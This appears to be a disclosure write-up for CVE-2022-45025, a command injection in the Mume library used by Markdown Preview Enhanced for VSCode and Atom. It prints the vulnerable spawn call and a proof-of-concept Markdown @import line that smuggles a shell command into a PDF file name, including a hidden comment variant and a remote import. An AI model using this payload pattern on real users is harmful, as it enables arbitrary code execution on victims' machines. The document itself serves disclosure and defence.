CVE-2022-45025

Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)

Description

The Mume markdown tool library was vulnerable to command injection due to use of spawn command with {shell: true} option. This could allow an attacker to achieve arbitary code execution by tricking victim into opening specially crafted Markdown file using VSCode or Atom. The library powers Markdown Preview Enhanced plugin for both VSCode and Atom.

Vulnerable code snippet:

const task = spawn(
      "pdf2svg",
      [
        `"${pdfFilePath}"`,
        `"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
        "all",
      ],
      { shell: true },
    )

Proof of Concept

The following Markdown document allows an attacker to execute arbitary command:

@import "$(open -a Calculator > /dev/null | exit 0)hello.pdf"

The following comment will be recognised by MPE as valid "@import" command:

<!-- @import "$(open -a Calculator > /dev/null | exit 0)hello.pdf" -->

Alternatively, the payload could be executed from external source:

<!-- @import "https://raw.githubusercontent.com/yuriisanin/CVE-2022-45025/main/examples/malicious.md" -->

DEMO for both VSCode and Atom on YouTube.

Support

You can follow me on Twitter, GitHub or YouTube.